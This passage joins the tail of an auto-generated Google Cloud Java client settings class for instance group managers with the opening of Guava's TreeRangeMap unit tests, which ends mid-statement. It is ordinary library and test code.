RPC's polling algorithm. For example, to * configure the RetrySettings for abandonInstances: * * <pre>{@code * // This snippet has been automatically generated and should be regarded as a code template only. * // It will require modifications to work: * // - It may require correct/in-range values for request initialization. * // - It may require specifying regional endpoints when creating the service client as shown in * // https://cloud.google.com/java/docs/setup#configure_endpoints_for_the_client_library * InstanceGroupManagersSettings.Builder instanceGroupManagersSettingsBuilder = * InstanceGroupManagersSettings.newBuilder(); * TimedRetryAlgorithm timedRetryAlgorithm = * OperationalTimedPollAlgorithm.create( * RetrySettings.newBuilder() * .setInitialRetryDelayDuration(Duration.ofMillis(500)) * .setRetryDelayMultiplier(1.5) * .setMaxRetryDelayDuration(Duration.ofMillis(5000)) * .setTotalTimeoutDuration(Duration.ofHours(24)) * .build()); * instanceGroupManagersSettingsBuilder * .createClusterOperationSettings() * .setPollingAlgorithm(timedRetryAlgorithm) * .build(); * }</pre> */ @Generated("by gapic-generator-java") public class InstanceGroupManagersSettings extends ClientSettings<InstanceGroupManagersSettings> { /** Returns the object with the settings used for calls to abandonInstances. */ public UnaryCallSettings<AbandonInstancesInstanceGroupManagerRequest, Operation> abandonInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).abandonInstancesSettings(); } /** Returns the object with the settings used for calls to abandonInstances. */ public OperationCallSettings<AbandonInstancesInstanceGroupManagerRequest, Operation, Operation> abandonInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .abandonInstancesOperationSettings(); } /** Returns the object with the settings used for calls to aggregatedList. */ public PagedCallSettings< AggregatedListInstanceGroupManagersRequest, InstanceGroupManagerAggregatedList, AggregatedListPagedResponse> aggregatedListSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).aggregatedListSettings(); } /** Returns the object with the settings used for calls to applyUpdatesToInstances. */ public UnaryCallSettings<ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation> applyUpdatesToInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .applyUpdatesToInstancesSettings(); } /** Returns the object with the settings used for calls to applyUpdatesToInstances. */ public OperationCallSettings< ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation, Operation> applyUpdatesToInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .applyUpdatesToInstancesOperationSettings(); } /** Returns the object with the settings used for calls to createInstances. */ public UnaryCallSettings<CreateInstancesInstanceGroupManagerRequest, Operation> createInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).createInstancesSettings(); } /** Returns the object with the settings used for calls to createInstances. */ public OperationCallSettings<CreateInstancesInstanceGroupManagerRequest, Operation, Operation> createInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .createInstancesOperationSettings(); } /** Returns the object with the settings used for calls to delete. */ public UnaryCallSettings<DeleteInstanceGroupManagerRequest, Operation> deleteSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).deleteSettings(); } /** Returns the object with the settings used for calls to delete. */ public OperationCallSettings<DeleteInstanceGroupManagerRequest, Operation, Operation> deleteOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).deleteOperationSettings(); } /** Returns the object with the settings used for calls to deleteInstances. */ public UnaryCallSettings<DeleteInstancesInstanceGroupManagerRequest, Operation> deleteInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).deleteInstancesSettings(); } /** Returns the object with the settings used for calls to deleteInstances. */ public OperationCallSettings<DeleteInstancesInstanceGroupManagerRequest, Operation, Operation> deleteInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .deleteInstancesOperationSettings(); } /** Returns the object with the settings used for calls to deletePerInstanceConfigs. */ public UnaryCallSettings<DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation> deletePerInstanceConfigsSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .deletePerInstanceConfigsSettings(); } /** Returns the object with the settings used for calls to deletePerInstanceConfigs. */ public OperationCallSettings< DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation> deletePerInstanceConfigsOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .deletePerInstanceConfigsOperationSettings(); } /** Returns the object with the settings used for calls to get. */ public UnaryCallSettings<GetInstanceGroupManagerRequest, InstanceGroupManager> getSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).getSettings(); } /** Returns the object with the settings used for calls to insert. */ public UnaryCallSettings<InsertInstanceGroupManagerRequest, Operation> insertSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).insertSettings(); } /** Returns the object with the settings used for calls to insert. */ public OperationCallSettings<InsertInstanceGroupManagerRequest, Operation, Operation> insertOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).insertOperationSettings(); } /** Returns the object with the settings used for calls to list. */ public PagedCallSettings< ListInstanceGroupManagersRequest, InstanceGroupManagerList, ListPagedResponse> listSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).listSettings(); } /** Returns the object with the settings used for calls to listErrors. */ public PagedCallSettings< ListErrorsInstanceGroupManagersRequest, InstanceGroupManagersListErrorsResponse, ListErrorsPagedResponse> listErrorsSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).listErrorsSettings(); } /** Returns the object with the settings used for calls to listManagedInstances. */ public PagedCallSettings< ListManagedInstancesInstanceGroupManagersRequest, InstanceGroupManagersListManagedInstancesResponse, ListManagedInstancesPagedResponse> listManagedInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).listManagedInstancesSettings(); } /** Returns the object with the settings used for calls to listPerInstanceConfigs. */ public PagedCallSettings< ListPerInstanceConfigsInstanceGroupManagersRequest, InstanceGroupManagersListPerInstanceConfigsResp, ListPerInstanceConfigsPagedResponse> listPerInstanceConfigsSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).listPerInstanceConfigsSettings(); } /** Returns the object with the settings used for calls to patch. */ public UnaryCallSettings<PatchInstanceGroupManagerRequest, Operation> patchSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).patchSettings(); } /** Returns the object with the settings used for calls to patch. */ public OperationCallSettings<PatchInstanceGroupManagerRequest, Operation, Operation> patchOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).patchOperationSettings(); } /** Returns the object with the settings used for calls to patchPerInstanceConfigs. */ public UnaryCallSettings<PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation> patchPerInstanceConfigsSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .patchPerInstanceConfigsSettings(); } /** Returns the object with the settings used for calls to patchPerInstanceConfigs. */ public OperationCallSettings< PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation> patchPerInstanceConfigsOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .patchPerInstanceConfigsOperationSettings(); } /** Returns the object with the settings used for calls to recreateInstances. */ public UnaryCallSettings<RecreateInstancesInstanceGroupManagerRequest, Operation> recreateInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).recreateInstancesSettings(); } /** Returns the object with the settings used for calls to recreateInstances. */ public OperationCallSettings<RecreateInstancesInstanceGroupManagerRequest, Operation, Operation> recreateInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .recreateInstancesOperationSettings(); } /** Returns the object with the settings used for calls to resize. */ public UnaryCallSettings<ResizeInstanceGroupManagerRequest, Operation> resizeSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).resizeSettings(); } /** Returns the object with the settings used for calls to resize. */ public OperationCallSettings<ResizeInstanceGroupManagerRequest, Operation, Operation> resizeOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).resizeOperationSettings(); } /** Returns the object with the settings used for calls to resumeInstances. */ public UnaryCallSettings<ResumeInstancesInstanceGroupManagerRequest, Operation> resumeInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).resumeInstancesSettings(); } /** Returns the object with the settings used for calls to resumeInstances. */ public OperationCallSettings<ResumeInstancesInstanceGroupManagerRequest, Operation, Operation> resumeInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .resumeInstancesOperationSettings(); } /** Returns the object with the settings used for calls to setInstanceTemplate. */ public UnaryCallSettings<SetInstanceTemplateInstanceGroupManagerRequest, Operation> setInstanceTemplateSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).setInstanceTemplateSettings(); } /** Returns the object with the settings used for calls to setInstanceTemplate. */ public OperationCallSettings<SetInstanceTemplateInstanceGroupManagerRequest, Operation, Operation> setInstanceTemplateOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .setInstanceTemplateOperationSettings(); } /** Returns the object with the settings used for calls to setTargetPools. */ public UnaryCallSettings<SetTargetPoolsInstanceGroupManagerRequest, Operation> setTargetPoolsSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).setTargetPoolsSettings(); } /** Returns the object with the settings used for calls to setTargetPools. */ public OperationCallSettings<SetTargetPoolsInstanceGroupManagerRequest, Operation, Operation> setTargetPoolsOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .setTargetPoolsOperationSettings(); } /** Returns the object with the settings used for calls to startInstances. */ public UnaryCallSettings<StartInstancesInstanceGroupManagerRequest, Operation> startInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).startInstancesSettings(); } /** Returns the object with the settings used for calls to startInstances. */ public OperationCallSettings<StartInstancesInstanceGroupManagerRequest, Operation, Operation> startInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .startInstancesOperationSettings(); } /** Returns the object with the settings used for calls to stopInstances. */ public UnaryCallSettings<StopInstancesInstanceGroupManagerRequest, Operation> stopInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).stopInstancesSettings(); } /** Returns the object with the settings used for calls to stopInstances. */ public OperationCallSettings<StopInstancesInstanceGroupManagerRequest, Operation, Operation> stopInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).stopInstancesOperationSettings(); } /** Returns the object with the settings used for calls to suspendInstances. */ public UnaryCallSettings<SuspendInstancesInstanceGroupManagerRequest, Operation> suspendInstancesSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()).suspendInstancesSettings(); } /** Returns the object with the settings used for calls to suspendInstances. */ public OperationCallSettings<SuspendInstancesInstanceGroupManagerRequest, Operation, Operation> suspendInstancesOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .suspendInstancesOperationSettings(); } /** Returns the object with the settings used for calls to updatePerInstanceConfigs. */ public UnaryCallSettings<UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation> updatePerInstanceConfigsSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .updatePerInstanceConfigsSettings(); } /** Returns the object with the settings used for calls to updatePerInstanceConfigs. */ public OperationCallSettings< UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation> updatePerInstanceConfigsOperationSettings() { return ((InstanceGroupManagersStubSettings) getStubSettings()) .updatePerInstanceConfigsOperationSettings(); } public static final InstanceGroupManagersSettings create(InstanceGroupManagersStubSettings stub) throws IOException { return new InstanceGroupManagersSettings.Builder(stub.toBuilder()).build(); } /** Returns a builder for the default ExecutorProvider for this service. */ public static InstantiatingExecutorProvider.Builder defaultExecutorProviderBuilder() { return InstanceGroupManagersStubSettings.defaultExecutorProviderBuilder(); } /** Returns the default service endpoint. */ public static String getDefaultEndpoint() { return InstanceGroupManagersStubSettings.getDefaultEndpoint(); } /** Returns the default service scopes. */ public static List<String> getDefaultServiceScopes() { return InstanceGroupManagersStubSettings.getDefaultServiceScopes(); } /** Returns a builder for the default credentials for this service. */ public static GoogleCredentialsProvider.Builder defaultCredentialsProviderBuilder() { return InstanceGroupManagersStubSettings.defaultCredentialsProviderBuilder(); } /** Returns a builder for the default ChannelProvider for this service. */ public static InstantiatingHttpJsonChannelProvider.Builder defaultHttpJsonTransportProviderBuilder() { return InstanceGroupManagersStubSettings.defaultHttpJsonTransportProviderBuilder(); } public static TransportChannelProvider defaultTransportChannelProvider() { return InstanceGroupManagersStubSettings.defaultTransportChannelProvider(); } public static ApiClientHeaderProvider.Builder defaultApiClientHeaderProviderBuilder() { return InstanceGroupManagersStubSettings.defaultApiClientHeaderProviderBuilder(); } /** Returns a new builder for this class. */ public static Builder newBuilder() { return Builder.createDefault(); } /** Returns a new builder for this class. */ public static Builder newBuilder(ClientContext clientContext) { return new Builder(clientContext); } /** Returns a builder containing all the values of this settings class. */ public Builder toBuilder() { return new Builder(this); } protected InstanceGroupManagersSettings(Builder settingsBuilder) throws IOException { super(settingsBuilder); } /** Builder for InstanceGroupManagersSettings. */ public static class Builder extends ClientSettings.Builder<InstanceGroupManagersSettings, Builder> { protected Builder() throws IOException { this(((ClientContext) null)); } protected Builder(ClientContext clientContext) { super(InstanceGroupManagersStubSettings.newBuilder(clientContext)); } protected Builder(InstanceGroupManagersSettings settings) { super(settings.getStubSettings().toBuilder()); } protected Builder(InstanceGroupManagersStubSettings.Builder stubSettings) { super(stubSettings); } private static Builder createDefault() { return new Builder(InstanceGroupManagersStubSettings.newBuilder()); } public InstanceGroupManagersStubSettings.Builder getStubSettingsBuilder() { return ((InstanceGroupManagersStubSettings.Builder) getStubSettings()); } /** * Applies the given settings updater function to all of the unary API methods in this service. * * <p>Note: This method does not support applying settings to streaming methods. */ public Builder applyToAllUnaryMethods( ApiFunction<UnaryCallSettings.Builder<?, ?>, Void> settingsUpdater) { super.applyToAllUnaryMethods( getStubSettingsBuilder().unaryMethodSettingsBuilders(), settingsUpdater); return this; } /** Returns the builder for the settings used for calls to abandonInstances. */ public UnaryCallSettings.Builder<AbandonInstancesInstanceGroupManagerRequest, Operation> abandonInstancesSettings() { return getStubSettingsBuilder().abandonInstancesSettings(); } /** Returns the builder for the settings used for calls to abandonInstances. */ public OperationCallSettings.Builder< AbandonInstancesInstanceGroupManagerRequest, Operation, Operation> abandonInstancesOperationSettings() { return getStubSettingsBuilder().abandonInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to aggregatedList. */ public PagedCallSettings.Builder< AggregatedListInstanceGroupManagersRequest, InstanceGroupManagerAggregatedList, AggregatedListPagedResponse> aggregatedListSettings() { return getStubSettingsBuilder().aggregatedListSettings(); } /** Returns the builder for the settings used for calls to applyUpdatesToInstances. */ public UnaryCallSettings.Builder<ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation> applyUpdatesToInstancesSettings() { return getStubSettingsBuilder().applyUpdatesToInstancesSettings(); } /** Returns the builder for the settings used for calls to applyUpdatesToInstances. */ public OperationCallSettings.Builder< ApplyUpdatesToInstancesInstanceGroupManagerRequest, Operation, Operation> applyUpdatesToInstancesOperationSettings() { return getStubSettingsBuilder().applyUpdatesToInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to createInstances. */ public UnaryCallSettings.Builder<CreateInstancesInstanceGroupManagerRequest, Operation> createInstancesSettings() { return getStubSettingsBuilder().createInstancesSettings(); } /** Returns the builder for the settings used for calls to createInstances. */ public OperationCallSettings.Builder< CreateInstancesInstanceGroupManagerRequest, Operation, Operation> createInstancesOperationSettings() { return getStubSettingsBuilder().createInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to delete. */ public UnaryCallSettings.Builder<DeleteInstanceGroupManagerRequest, Operation> deleteSettings() { return getStubSettingsBuilder().deleteSettings(); } /** Returns the builder for the settings used for calls to delete. */ public OperationCallSettings.Builder<DeleteInstanceGroupManagerRequest, Operation, Operation> deleteOperationSettings() { return getStubSettingsBuilder().deleteOperationSettings(); } /** Returns the builder for the settings used for calls to deleteInstances. */ public UnaryCallSettings.Builder<DeleteInstancesInstanceGroupManagerRequest, Operation> deleteInstancesSettings() { return getStubSettingsBuilder().deleteInstancesSettings(); } /** Returns the builder for the settings used for calls to deleteInstances. */ public OperationCallSettings.Builder< DeleteInstancesInstanceGroupManagerRequest, Operation, Operation> deleteInstancesOperationSettings() { return getStubSettingsBuilder().deleteInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to deletePerInstanceConfigs. */ public UnaryCallSettings.Builder<DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation> deletePerInstanceConfigsSettings() { return getStubSettingsBuilder().deletePerInstanceConfigsSettings(); } /** Returns the builder for the settings used for calls to deletePerInstanceConfigs. */ public OperationCallSettings.Builder< DeletePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation> deletePerInstanceConfigsOperationSettings() { return getStubSettingsBuilder().deletePerInstanceConfigsOperationSettings(); } /** Returns the builder for the settings used for calls to get. */ public UnaryCallSettings.Builder<GetInstanceGroupManagerRequest, InstanceGroupManager> getSettings() { return getStubSettingsBuilder().getSettings(); } /** Returns the builder for the settings used for calls to insert. */ public UnaryCallSettings.Builder<InsertInstanceGroupManagerRequest, Operation> insertSettings() { return getStubSettingsBuilder().insertSettings(); } /** Returns the builder for the settings used for calls to insert. */ public OperationCallSettings.Builder<InsertInstanceGroupManagerRequest, Operation, Operation> insertOperationSettings() { return getStubSettingsBuilder().insertOperationSettings(); } /** Returns the builder for the settings used for calls to list. */ public PagedCallSettings.Builder< ListInstanceGroupManagersRequest, InstanceGroupManagerList, ListPagedResponse> listSettings() { return getStubSettingsBuilder().listSettings(); } /** Returns the builder for the settings used for calls to listErrors. */ public PagedCallSettings.Builder< ListErrorsInstanceGroupManagersRequest, InstanceGroupManagersListErrorsResponse, ListErrorsPagedResponse> listErrorsSettings() { return getStubSettingsBuilder().listErrorsSettings(); } /** Returns the builder for the settings used for calls to listManagedInstances. */ public PagedCallSettings.Builder< ListManagedInstancesInstanceGroupManagersRequest, InstanceGroupManagersListManagedInstancesResponse, ListManagedInstancesPagedResponse> listManagedInstancesSettings() { return getStubSettingsBuilder().listManagedInstancesSettings(); } /** Returns the builder for the settings used for calls to listPerInstanceConfigs. */ public PagedCallSettings.Builder< ListPerInstanceConfigsInstanceGroupManagersRequest, InstanceGroupManagersListPerInstanceConfigsResp, ListPerInstanceConfigsPagedResponse> listPerInstanceConfigsSettings() { return getStubSettingsBuilder().listPerInstanceConfigsSettings(); } /** Returns the builder for the settings used for calls to patch. */ public UnaryCallSettings.Builder<PatchInstanceGroupManagerRequest, Operation> patchSettings() { return getStubSettingsBuilder().patchSettings(); } /** Returns the builder for the settings used for calls to patch. */ public OperationCallSettings.Builder<PatchInstanceGroupManagerRequest, Operation, Operation> patchOperationSettings() { return getStubSettingsBuilder().patchOperationSettings(); } /** Returns the builder for the settings used for calls to patchPerInstanceConfigs. */ public UnaryCallSettings.Builder<PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation> patchPerInstanceConfigsSettings() { return getStubSettingsBuilder().patchPerInstanceConfigsSettings(); } /** Returns the builder for the settings used for calls to patchPerInstanceConfigs. */ public OperationCallSettings.Builder< PatchPerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation> patchPerInstanceConfigsOperationSettings() { return getStubSettingsBuilder().patchPerInstanceConfigsOperationSettings(); } /** Returns the builder for the settings used for calls to recreateInstances. */ public UnaryCallSettings.Builder<RecreateInstancesInstanceGroupManagerRequest, Operation> recreateInstancesSettings() { return getStubSettingsBuilder().recreateInstancesSettings(); } /** Returns the builder for the settings used for calls to recreateInstances. */ public OperationCallSettings.Builder< RecreateInstancesInstanceGroupManagerRequest, Operation, Operation> recreateInstancesOperationSettings() { return getStubSettingsBuilder().recreateInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to resize. */ public UnaryCallSettings.Builder<ResizeInstanceGroupManagerRequest, Operation> resizeSettings() { return getStubSettingsBuilder().resizeSettings(); } /** Returns the builder for the settings used for calls to resize. */ public OperationCallSettings.Builder<ResizeInstanceGroupManagerRequest, Operation, Operation> resizeOperationSettings() { return getStubSettingsBuilder().resizeOperationSettings(); } /** Returns the builder for the settings used for calls to resumeInstances. */ public UnaryCallSettings.Builder<ResumeInstancesInstanceGroupManagerRequest, Operation> resumeInstancesSettings() { return getStubSettingsBuilder().resumeInstancesSettings(); } /** Returns the builder for the settings used for calls to resumeInstances. */ public OperationCallSettings.Builder< ResumeInstancesInstanceGroupManagerRequest, Operation, Operation> resumeInstancesOperationSettings() { return getStubSettingsBuilder().resumeInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to setInstanceTemplate. */ public UnaryCallSettings.Builder<SetInstanceTemplateInstanceGroupManagerRequest, Operation> setInstanceTemplateSettings() { return getStubSettingsBuilder().setInstanceTemplateSettings(); } /** Returns the builder for the settings used for calls to setInstanceTemplate. */ public OperationCallSettings.Builder< SetInstanceTemplateInstanceGroupManagerRequest, Operation, Operation> setInstanceTemplateOperationSettings() { return getStubSettingsBuilder().setInstanceTemplateOperationSettings(); } /** Returns the builder for the settings used for calls to setTargetPools. */ public UnaryCallSettings.Builder<SetTargetPoolsInstanceGroupManagerRequest, Operation> setTargetPoolsSettings() { return getStubSettingsBuilder().setTargetPoolsSettings(); } /** Returns the builder for the settings used for calls to setTargetPools. */ public OperationCallSettings.Builder< SetTargetPoolsInstanceGroupManagerRequest, Operation, Operation> setTargetPoolsOperationSettings() { return getStubSettingsBuilder().setTargetPoolsOperationSettings(); } /** Returns the builder for the settings used for calls to startInstances. */ public UnaryCallSettings.Builder<StartInstancesInstanceGroupManagerRequest, Operation> startInstancesSettings() { return getStubSettingsBuilder().startInstancesSettings(); } /** Returns the builder for the settings used for calls to startInstances. */ public OperationCallSettings.Builder< StartInstancesInstanceGroupManagerRequest, Operation, Operation> startInstancesOperationSettings() { return getStubSettingsBuilder().startInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to stopInstances. */ public UnaryCallSettings.Builder<StopInstancesInstanceGroupManagerRequest, Operation> stopInstancesSettings() { return getStubSettingsBuilder().stopInstancesSettings(); } /** Returns the builder for the settings used for calls to stopInstances. */ public OperationCallSettings.Builder< StopInstancesInstanceGroupManagerRequest, Operation, Operation> stopInstancesOperationSettings() { return getStubSettingsBuilder().stopInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to suspendInstances. */ public UnaryCallSettings.Builder<SuspendInstancesInstanceGroupManagerRequest, Operation> suspendInstancesSettings() { return getStubSettingsBuilder().suspendInstancesSettings(); } /** Returns the builder for the settings used for calls to suspendInstances. */ public OperationCallSettings.Builder< SuspendInstancesInstanceGroupManagerRequest, Operation, Operation> suspendInstancesOperationSettings() { return getStubSettingsBuilder().suspendInstancesOperationSettings(); } /** Returns the builder for the settings used for calls to updatePerInstanceConfigs. */ public UnaryCallSettings.Builder<UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation> updatePerInstanceConfigsSettings() { return getStubSettingsBuilder().updatePerInstanceConfigsSettings(); } /** Returns the builder for the settings used for calls to updatePerInstanceConfigs. */ public OperationCallSettings.Builder< UpdatePerInstanceConfigsInstanceGroupManagerRequest, Operation, Operation> updatePerInstanceConfigsOperationSettings() { return getStubSettingsBuilder().updatePerInstanceConfigsOperationSettings(); } @Override public InstanceGroupManagersSettings build() throws IOException { return new InstanceGroupManagersSettings(this); } } }
google/guava
36,026
guava-tests/test/com/google/common/collect/TreeRangeMapTest.java
/* * Copyright (C) 2011 The Guava Authors * * Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except * in compliance with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package com.google.common.collect; import static com.google.common.collect.BoundType.OPEN; import static com.google.common.collect.testing.Helpers.mapEntry; import static org.junit.Assert.assertThrows; import com.google.common.annotations.GwtIncompatible; import com.google.common.collect.testing.MapTestSuiteBuilder; import com.google.common.collect.testing.SampleElements; import com.google.common.collect.testing.TestMapGenerator; import com.google.common.collect.testing.features.CollectionFeature; import com.google.common.collect.testing.features.CollectionSize; import com.google.common.collect.testing.features.MapFeature; import com.google.common.testing.EqualsTester; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.NoSuchElementException; import java.util.function.BiFunction; import junit.framework.Test; import junit.framework.TestCase; import junit.framework.TestSuite; import org.jspecify.annotations.NullUnmarked; /** * Tests for {@code TreeRangeMap}. * * @author Louis Wasserman */ @GwtIncompatible // NavigableMap @NullUnmarked public class TreeRangeMapTest extends TestCase { @AndroidIncompatible // test-suite builders public static Test suite() { TestSuite suite = new TestSuite(); suite.addTestSuite(TreeRangeMapTest.class); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.asMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering().onKeys().sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.asMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER, CollectionFeature.SUPPORTS_ITERATOR_REMOVE) .createTestSuite()); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.subRangeMap(Range.atMost(22)).asMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering().onKeys().sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.subRangeMap.asMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER) .createTestSuite()); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return rangeMap.asDescendingMapOfRanges(); } @SuppressWarnings("unchecked") @Override public Entry<Range<Integer>, String>[] createArray(int length) { return (Entry<Range<Integer>, String>[]) new Entry<?, ?>[length]; } @Override public Iterable<Entry<Range<Integer>, String>> order( List<Entry<Range<Integer>, String>> insertionOrder) { return Range.<Integer>rangeLexOrdering() .reverse() .onKeys() .sortedCopy(insertionOrder); } @SuppressWarnings("unchecked") @Override public Range<Integer>[] createKeyArray(int length) { return (Range<Integer>[]) new Range<?>[length]; } @Override public String[] createValueArray(int length) { return new String[length]; } }) .named("TreeRangeMap.asDescendingMapOfRanges") .withFeatures( CollectionSize.ANY, MapFeature.SUPPORTS_REMOVE, MapFeature.ALLOWS_ANY_NULL_QUERIES, CollectionFeature.KNOWN_ORDER, CollectionFeature.SUPPORTS_ITERATOR_REMOVE) .createTestSuite()); suite.addTest( MapTestSuiteBuilder.using( new TestMapGenerator<Range<Integer>, String>() { @Override public SampleElements<Entry<Range<Integer>, String>> samples() { return new SampleElements<>( mapEntry(Range.singleton(0), "banana"), mapEntry(Range.closedOpen(3, 5), "frisbee"), mapEntry(Range.atMost(-1), "fruitcake"), mapEntry(Range.open(10, 15), "elephant"), mapEntry(Range.closed(20, 22), "umbrella")); } @Override public Map<Range<Integer>, String> create(Object... elements) { RangeMap<Integer, String> rangeMap = TreeRangeMap.create(); for (Object o : elements) { @SuppressWarnings("unchecked") Entry<Range<Integer>, String> entry = (Entry<Range<Integer>, String>) o; rangeMap.put(entry.getKey(), entry.getValue()); } return 